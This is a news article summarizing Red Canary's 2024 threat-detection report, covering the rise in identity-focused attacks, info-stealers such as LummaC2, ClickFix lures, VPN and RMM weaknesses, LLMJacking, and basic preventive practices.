An analysis of 93,000 threats published this week by Red Canary, a provider of a managed detection and response (MDR) service, finds the number of cyberattacks seeking to compromise an identity increased by a factor of four in 2024.
Keith McCammon, chief security officer at Red Canary, said the most common result of those breaches was the installation of some type of info-stealer software used to exfiltrate sensitive data.
The most commonly used info-stealer is LummaC2, which cybercriminals can gain access to for anywhere from $250 per month to a one-time payment of $20,000. A larger percentage of those attacks are being aimed at macOS platforms, with Red Canary seeing a 400% increase in detections in 2024. On the plus side, 95% of those incidents occurred prior to Apple remediating a Gatekeeper bypass technique last September, compared to only 5% that occurred throughout the rest of the year, the report noted.
In general, the sharp increase in attacks aimed at, for example, cloud accounts or email systems, makes it clear that cybercriminals are shifting tactics and techniques to gain access to centralized systems through which they can steal data or distribute malware, he added.
More troubling still, none of the threats detected by Red Canary in 2024 in 308 PB of telemetry data were thwarted by the security controls organizations had in place.
Surprisingly, one of the tactics increasingly being employed to gain initial access techniques is paste and run, also known as “ClickFix” and “fakeCAPTCHA” which trick end user into executing malicious JavaScript code under the pretense it will fix some issue on their system,
Additionally, cybercriminals are targeting weaknesses in virtual private networks (VPNs) and remote monitoring and management (RMM) platforms, in addition to posing as helpful IT administrators who need to remotely install software on a corporate system. Cybercriminals are also becoming more adept at disabling or modifying firewall rules and logging, the report also noted.
Finally, as usage of large language models (LLMs) increased, Red Canary began to see cybercriminals selling access to instances of artificial intelligence models they had been able to access, otherwise known as LLMJacking.
The one thing that is clear is that most successful cyberattacks are not especially complex. In fact, many of them can be prevented simply by implementing and maintaining a set of best practices, such as restricting VPN access to a specific sanction platform or regularly installing patches to applications.
There is, of course, no doubt that the tactics and techniques being employed by cybercriminals will continue to evolve as they leverage artificial intelligence to create more sophisticated social engineering attacks to compromise identities. However, they are also counting on simple inertia that enables them to successfully launch cyberattacks using comparatively trivial techniques that don’t cost nearly as much to develop. After all, why go to the trouble of breaking into a locked window on the upper floor of a building when they already have a key to the front door?
The challenge, as always, is making sure the key to make sure the keys don’t go missing in the first place and, assuming they are, regularly changing the lock on the door.
